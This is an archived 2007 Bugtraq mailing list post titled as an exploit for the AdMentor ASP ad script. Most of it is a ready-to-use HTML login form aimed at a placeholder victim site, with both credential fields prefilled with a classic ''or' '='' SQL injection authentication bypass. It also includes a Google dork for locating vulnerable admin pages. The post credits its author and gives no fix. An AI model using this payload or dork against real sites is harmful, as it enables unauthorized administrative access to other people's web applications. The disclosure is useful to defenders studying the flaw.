lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070220190229.18354.qmail@securityfocus.com>
Date: 20 Feb 2007 19:02:29 -0000
From: crazy_king@...7.org
To: bugtraq@...urityfocus.com
Subject: AdMentor Script Remote  SQL injection Exploit

<html><title>AdMentor Script Remote  SQL injection Exploit</title>
===============================================================================================
<p><b><font size="2">[Script Name: <font color="#0000FF">AdMentor admin SQL
injection
</font></font></b></p>
<p><b><font size="2">[Coded by   : <font color="#FF0000">Cr@...King
</font></font></b></p>
<p><b><font size="2">[Author     : <font color="#FF0000">Cr@...King
</font></font></b></p>
<p><b><font size="2">[Contact    : <font color="#FF0000">Crazy_King@...7.org
</font></font></b></p>
<p><b><font size="2">[Dork       : <font color="#0000FF">inurl:"admentor/admin"
</font></font></b></p>
<p><b><font size="2">[Dork Ex.   : <font
color="#0000FF">http://www.google.com.tr/search?hl=tr&q=inurl%3A%22admentor%2Fadmin%22&btnG=Google%27da+Ara&meta=
</font></font></b></p>
<p><b><font size="2">[S.Page     : <font
color="#0000FF">http://www.aspcode.net/products/admentor
</font></font></b></p>
<p><b><font size="2">[Thanks     : <font color="#008000">Erne & ApAci & Eno7 &
Uyuss & Liz0zim & Thehacker
&amp; Xoron &amp; Ajann</font></font></b>
===============================================================================================
</p>
<FORM NAME=giris ACTION="http://victim.com/[path to script]/admin/login.asp"
METHOD=post>
<table align=center>
<td>Kullanici Adi:</td><td><INPUT NAME=kullanici class="input" value="'or' '='"
SIZE=15></td>
</tr><tr>
<td>Sifre:</td><td><INPUT NAME=parola TYPE=text class="input" value="'or' '='"
SIZE=15></td>
</tr><tr>
<td align=center colspan=2><BUTTON class="input" TYPE=submit>Giris</BUTTON></td>
<b><font face="Verdana" size="2" color="#008000">Exploit Coded By
Cr@...King</font></b></p>
</tr></table></form></html>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ